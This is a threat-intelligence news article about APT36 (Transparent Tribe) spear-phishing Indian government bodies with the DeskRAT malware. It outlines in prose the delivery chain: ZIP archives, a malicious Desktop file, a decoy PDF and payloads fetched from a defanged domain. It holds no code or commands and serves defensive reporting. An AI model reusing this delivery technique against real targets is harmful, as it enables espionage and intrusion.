A Pakistan-nexus threat actor, identified as APT36, also known by the alias Transparent Tribe, has been observed executing a series of spear-phishing attacks. These campaigns specifically targeted Indian government entities, utilizing a Golang-based malware known as DeskRAT. This state-sponsored hacking group has a documented history of activity dating back to at least 2013, consistently focusing on cyber espionage operations.

APT36 Campaign Attribution and Timeline

The recent malicious activity was meticulously observed and documented by Sekoia during August and September 2025. Sekoia’s analysis directly attributed these operations to Transparent Tribe (APT36). This specific campaign builds upon and is consistent with a prior campaign that was disclosed by CYFIRMA in August 2025, highlighting a sustained and ongoing threat. The use of DeskRAT in these attacks signifies an evolving toolkit for the threat actor.

Sophisticated Attack Chain and Malware Delivery

The attack chains commenced with the delivery of spear-phishing emails. These emails were crafted to either contain a malicious ZIP file attachment directly or to provide a link directing targets to an archive hosted on legitimate cloud services, such as Google Drive. Once downloaded and accessed, the ZIP file contained a malicious Desktop file. This Desktop file was engineered to embed specific commands: one command was designed to display a decoy PDF document, identified as “CDS_Directive_Armed_Forces.pdf,” which would open using Mozilla Firefox. Simultaneously, another command within the Desktop file was executed to launch the primary DeskRAT payload. Both the decoy PDF and the critical main payload were retrieved from an external server, precisely “modgovindia[.]com,” ensuring the full execution of the attack. This dual-purpose delivery method allowed APT36 to maintain stealth while deploying its cyber espionage tools against Indian government targets.